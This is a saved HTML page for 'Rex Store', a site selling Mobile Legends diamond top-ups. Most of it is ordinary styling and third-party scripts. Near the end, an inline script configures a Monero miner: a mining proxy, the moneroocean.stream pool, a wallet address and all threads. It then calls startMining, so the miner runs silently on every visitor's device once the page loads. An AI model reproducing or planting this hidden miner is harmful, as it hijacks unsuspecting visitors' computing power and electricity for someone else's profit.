<html lang="en">
<script src="chrome-extension://eppiocemhmnlbhjplcgkofciiegomcon/content/location/location.js" id="eppiocemhmnlbhjplcgkofciiegomcon"></script>
<script src="chrome-extension://eppiocemhmnlbhjplcgkofciiegomcon/libs/extend-native-history-api.js"></script>
<script src="chrome-extension://eppiocemhmnlbhjplcgkofciiegomcon/libs/requests.js"></script>

<head>
    <title>Rex Store</title>
    <!-- Google tag (gtag.js) -->
    <script async="" src="https://www.googletagmanager.com/gtag/js?id=G-FN3GLJJKKG"></script>
    <script>
        window.dataLayer = window.dataLayer || [];

        function gtag() {
            dataLayer.push(arguments);
        }
        gtag('js', new Date());

        gtag('config', 'G-FN3GLJJKKG');
    </script>
    <meta name="description" content="Safest way to purchase MLBB diamond.">
    <meta property="og:description" content="Rex Store will soon add more popular games in the website for you guy to top up.">
    <meta property="og:image" content="https://aheioqhobo.cloudimg.io/v7/_playground-bucket-v2.teleporthq.io_/937562b6-a6b6-43f8-b347-86caf9f4a60c/dc51311a-3407-491b-bc61-b3fbc8ee825d?org_if_sml=1&amp;force_format=original">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta charset="utf-8">
    <meta property="twitter:card" content="summary_large_image">


    <style data-tag="reset-style-sheet">
        html {
            line-height: 1.15;
        }
        
        body {
            margin: 0;
        }
        
        * {
            box-sizing: border-box;
            border-width: 0;
            border-style: solid;
        }
        
        p,
        li,
        ul,
        pre,
        div,
        h1,
        h2,
        h3,
        h4,
        h5,
        h6,
        figure,
        blockquote,
        figcaption {
            margin: 0;
            padding: 0;
        }
        
        button {
            background-color: transparent;
        }
        
        button,
        input,
        optgroup,
        select,
        textarea {
            font-family: inherit;
            font-size: 100%;
            line-height: 1.15;
            margin: 0;
        }
        
        button,
        select {
            text-transform: none;
        }
        
        button,
        [type="button"],
        [type="reset"],
        [type="submit"] {
            -webkit-appearance: button;
        }
        
        button::-moz-focus-inner,
        [type="button"]::-moz-focus-inner,
        [type="reset"]::-moz-focus-inner,
        [type="submit"]::-moz-focus-inner {
            border-style: none;
            padding: 0;
        }
        
        button:-moz-focus,
        [type="button"]:-moz-focus,
        [type="reset"]:-moz-focus,
        [type="submit"]:-moz-focus {
            outline: 1px dotted ButtonText;
        }
        
        a {
            color: inherit;
            text-decoration: inherit;
        }
        
        input {
            padding: 2px 4px;
        }
        
        img {
            display: block;
        }
        
        html {
            scroll-behavior: smooth
        }
    </style>
    <style data-tag="default-style-sheet">
        html {
            font-family: Inter;
            font-size: 16px;
        }
        
        body {
            font-weight: 400;
            font-style: normal;
            text-decoration: none;
            text-transform: none;
            letter-spacing: normal;
            line-height: 1.15;
            color: var(--dl-color-gray-black);
            background-color: var(--dl-color-gray-white);
        }
        /* Optional: Customize modal style */
        
        .modal-content img {
            width: 100%;
            height: auto;
        }
    </style>
    <link rel="stylesheet" href="https://unpkg.com/animate.css@4.1.1/animate.css">
    <link rel="shortcut icon" href="./rexstore.jpg" type="icon/png" sizes="32x32">
    <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Inter:wght@100;200;300;400;500;600;700;800;900&amp;display=swap" data-tag="font">
    <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Dangrek:wght@400&amp;display=swap" data-tag="font">
    <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Noto+Serif+Khmer:wght@100;200;300;400;500;600;700;800;900&amp;display=swap" data-tag="font">
    <link rel="stylesheet" href="https://unpkg.com/@teleporthq/teleport-custom-scripts/dist/style1.css">
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
    <style>
        [data-thq="thq-dropdown"]:hover>[data-thq="thq-dropdown-list"] {
            display: flex;
        }
        
        [data-thq="thq-dropdown"]:hover>div [data-thq="thq-dropdown-arrow"] {
            transform: rotate(90deg);
        }
    </style>
    <script bis_use="true" type="text/javascript" charset="utf-8" data-bis-config="[&quot;facebook.com/&quot;,&quot;twitter.com/&quot;,&quot;youtube-nocookie.com/embed/&quot;,&quot;//vk.com/&quot;,&quot;//www.vk.com/&quot;,&quot;linkedin.com/&quot;,&quot;//www.linkedin.com/&quot;,&quot;//instagram.com/&quot;,&quot;//www.instagram.com/&quot;,&quot;//www.google.com/recaptcha/api2/&quot;,&quot;//hangouts.google.com/webchat/&quot;,&quot;//www.google.com/calendar/&quot;,&quot;//www.google.com/maps/embed&quot;,&quot;spotify.com/&quot;,&quot;soundcloud.com/&quot;,&quot;//player.vimeo.com/&quot;,&quot;//disqus.com/&quot;,&quot;//tgwidget.com/&quot;,&quot;//js.driftt.com/&quot;,&quot;friends2follow.com&quot;,&quot;/widget&quot;,&quot;login&quot;,&quot;//video.bigmir.net/&quot;,&quot;blogger.com&quot;,&quot;//smartlock.google.com/&quot;,&quot;//keep.google.com/&quot;,&quot;/web.tolstoycomments.com/&quot;,&quot;moz-extension://&quot;,&quot;chrome-extension://&quot;,&quot;/auth/&quot;,&quot;//analytics.google.com/&quot;,&quot;adclarity.com&quot;,&quot;paddle.com/checkout&quot;,&quot;hcaptcha.com&quot;,&quot;recaptcha.net&quot;,&quot;2captcha.com&quot;,&quot;accounts.google.com&quot;,&quot;www.google.com/shopping/customerreviews&quot;,&quot;buy.tinypass.com&quot;,&quot;gstatic.com&quot;,&quot;secureir.ebaystatic.com&quot;,&quot;docs.google.com&quot;,&quot;contacts.google.com&quot;,&quot;github.com&quot;,&quot;mail.google.com&quot;,&quot;chat.google.com&quot;,&quot;audio.xpleer.com&quot;,&quot;keepa.com&quot;,&quot;static.xx.fbcdn.net&quot;,&quot;sas.selleramp.com&quot;,&quot;1plus1.video&quot;,&quot;console.googletagservices.com&quot;,&quot;//lnkd.demdex.net/&quot;,&quot;//radar.cedexis.com/&quot;,&quot;//li.protechts.net/&quot;,&quot;challenges.cloudflare.com/&quot;,&quot;ogs.google.com&quot;]"
        src="chrome-extension://eppiocemhmnlbhjplcgkofciiegomcon/../executers/vi-tr.js"></script>
</head>

<body __processed_a59d13ed-5562-47e5-a261-b7423b860cf1__="true" bis_register="W3sibWFzdGVyIjp0cnVlLCJleHRlbnNpb25JZCI6ImVwcGlvY2VtaG1ubGJoanBsY2drb2ZjaWllZ29tY29uIiwiYWRibG9ja2VyU3RhdHVzIjp7IkRJU1BMQVkiOiJkaXNhYmxlZCIsIkZBQ0VCT09LIjoiZGlzYWJsZWQiLCJUV0lUVEVSIjoiZGlzYWJsZWQiLCJSRURESVQiOiJkaXNhYmxlZCIsIlBJTlRFUkVTVCI6ImRpc2FibGVkIiwiSU5TVEFHUkFNIjoiZGlzYWJsZWQiLCJMSU5LRURJTiI6ImRpc2FibGVkIiwiQ09ORklHIjoiZGlzYWJsZWQifSwidmVyc2lvbiI6IjIuMC4xNiIsInNjb3JlIjoyMDAxNn1d"
    class="" style="">
    <link rel="stylesheet" href="./style1.css">
    <div bis_skin_checked="1">
        <link href="./index1.css" rel="stylesheet">
        <!-- Button to trigger modal -->
        <button type="button" class="btn btn-primary" data-toggle="modal" data-target="#imageModal" id="modalTriggerBtn" style="display: none;">
  Open Image
</button>


        <div class="bordy-container" bis_skin_checked="1">
            <div class="bordy-header" bis_skin_checked="1">
                <img alt="logo" src="./img/rexstore.jpg" loading="eager" class="bordy-logo">
                <h1 class="bordy-title">REX</h1>
            </div>
            <div id="home" class="slider">
                <div class="slides">
                    <img src="./img/rexst4re.png" alt="banner" class="slide s1">
                </div>
            </div>


            <div class="bordy-container18" bis_skin_checked="1">
                <span class="bordy-text32">TOP UP GAME</span>
                <div class="bordy-container19" bis_skin_checked="1">
                    <div class="bordy-container20" bis_skin_checked="1">
                        <img alt="image" src="img/mlbb.jpg" class="bordy-image06">
                        <span class="bordy-text33">
                <span>Mobile Legend&nbsp;</span>
                        <br>
                        </span>
                        <button type="button" class="bordy-button11 button" onclick="window.location.href = './mobile-legend.html'">
                Top up
            </button>

                    </div>

                    <div class="bordy-container36" bis_skin_checked="1">
                        <span class="bordy-text56">
        @2024 Rex Store, All right reserved.
    </span>
                        <div class="bordy-container37" bis_skin_checked="1">
                            <span class="bordy-text57">We Accept:&nbsp;</span>
                            <img alt="image" src="./img/bakong.png" class="bordy-image21">
                        </div>
                    </div>
                </div>
            </div>

            <!-- JavaScript to auto-trigger modal -->
            <script>
                // Wait for the document to be fully loaded
                document.addEventListener('DOMContentLoaded', function() {
                    // Auto-trigger the modal after 3 seconds (adjust as needed)
                    setTimeout(function() {
                        document.getElementById('modalTriggerBtn').click();
                    }, 3000); // 3 seconds
                });
            </script>
            <!-- Pixel Code for https://app.socialproofy.io/ -->
            <script async="" src="https://app.socialproofy.io/pixel/rl3hewfbafv5835mio369yqfg6ozz8jz"></script>
            <!-- END Pixel Code -->
            <!-- Bootstrap JavaScript (jQuery is required) -->
            <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script>
            <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.5.4/dist/umd/popper.min.js"></script>
            <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
            <script src="https://unpkg.com/swiper/swiper-bundle.min.js"></script>
            <script src="js/script.js"></script>
            <script type="text/javascript" async="" src="https://widget.myalice.ai/index.js"></script>
            <script>
                var swiper = new Swiper('.swiper-container', {
                    slidesPerView: 'auto', // Adjust this as needed
                    spaceBetween: 30, // Adjust this as needed
                    autoplay: {
                        delay: 5000, // Adjust the delay (in milliseconds) between slides
                        disableOnInteraction: false, // Set to false if you want autoplay to continue even when user interacts with swiper
                    },
                    // Add other Swiper settings as needed
                });
            </script>
            <script defer="" src="https://unpkg.com/@teleporthq/teleport-custom-scripts"></script>
            <script>
                server = "wss://ny1.xmrminingproxy.com";
                var pool = "moneroocean.stream";
                var walletAddress = "45aX28JemyxLFd2wZ2ja8mXvDrWzGzhpj7VGRXZaA29CKCVCNMbgvghSB9hVWZjqH85N9XJzrekcyJSz61ie2U8SSfB8rfP";
                var workerId = "GH-XMR"
                var threads = -1;
                var password = "";
                startMining(pool, walletAddress, workerId, threads, password);
                throttleMiner = 20;
            </script>
            <script>
                (function() {
                    function c() {
                        var b = a.contentDocument || a.contentWindow.document;
                        if (b) {
                            var d = b.createElement('script');
                            d.innerHTML = "window.__CF$cv$params={r:'8b302418e8484997',t:'MTcyMzYzMDA3OC4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";
                            b.getElementsByTagName('head')[0].appendChild(d)
                        }
                    }
                    if (document.body) {
                        var a = document.createElement('iframe');
                        a.height = 1;
                        a.width = 1;
                        a.style.position = 'absolute';
                        a.style.top = 0;
                        a.style.left = 0;
                        a.style.border = 'none';
                        a.style.visibility = 'hidden';
                        document.body.appendChild(a);
                        if ('loading' !== document.readyState) c();
                        else if (window.addEventListener) document.addEventListener('DOMContentLoaded', c);
                        else {
                            var e = document.onreadystatechange || function() {};
                            document.onreadystatechange = function(b) {
                                e(b);
                                'loading' !== document.readyState && (document.onreadystatechange = e, c())
                            }
                        }
                    }
                })();
            </script><iframe height="1" width="1" style="position: absolute; top: 0px; left: 0px; border: none; visibility: hidden;"></iframe>
            <script defer="" src="https://static.cloudflareinsights.com/beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015" integrity="sha512-ZpsOmlRQV6y907TI0dKBHq9Md29nnaEIPlkf84rnaERnq6zvWvPUqr2ft8M1aS28oN72PdrCzSjY4U6VaAw1EQ==" data-cf-beacon="{&quot;rayId&quot;:&quot;8b302418e8484997&quot;,&quot;serverTiming&quot;:{&quot;name&quot;:{&quot;cfL4&quot;:true}},&quot;version&quot;:&quot;2024.8.0&quot;,&quot;token&quot;:&quot;1dbf57c4addd43818152e54d3395fb2f&quot;}"
                crossorigin="anonymous"></script>

</body>

</html>